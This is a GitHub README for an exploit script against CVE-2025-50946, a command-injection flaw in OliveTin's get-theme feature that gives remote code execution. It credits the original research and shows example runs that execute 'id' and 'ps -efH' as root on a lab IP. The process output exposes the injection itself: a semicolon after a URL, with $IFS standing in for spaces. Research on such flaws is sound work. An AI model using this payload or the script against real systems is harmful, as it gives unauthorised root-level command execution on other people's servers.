runt1me/cve-2025-50946

# cve-2025-50946 Exploit script for CVE-2025-50946 (OliveTin get-theme RCE). The character requirements are finnicky and many commands that include multiple arguments may not be executed properly. I haven't taken the time to run down the root cause or try to make the script more robust. Holler at me or open a PR if you need something. Credit to [chrisWalker11](https://github.com/chrisWalker11) for the original research that I based this script on: [link](https://github.com/chrisWalker11/Cves/blob/main/CVE-2025-50946/CVE-2025-50946.md) # Example Usage Basic PoC: python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "id" [*] Target: http://192.168.141.194:1337 [*] Payload: id [*] Sending payload... uid=0(root) gid=0(root) groups=0(root) Process List (showing only a snippet of the output):  python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "ps -efH" [*] Target: http://192.168.141.194:1337 [*] Payload: ps$IFS-efH [*] Sending payload... UID PID PPID C STIME TTY TIME CMD root 2 0 0 09:20 ? 00:00:00 [kthreadd] root 1 0 0 09:20 ? 00:00:01 /sbin/init root 313 1 0 09:20 ? 00:00:00 /usr/lib/systemd/systemd-journald root 738 1 0 09:20 ? 00:00:00 /usr/sbin/cron -f -P root 749 1 0 09:20 ? 00:00:00 /usr/local/bin/OliveTin root 2167 749 0 13:26 ? 00:00:00 sh -c olivetin-get-theme http://t;ps$IFS-efH root 2168 2167 0 13:26 ? 00:00:00 ps -efH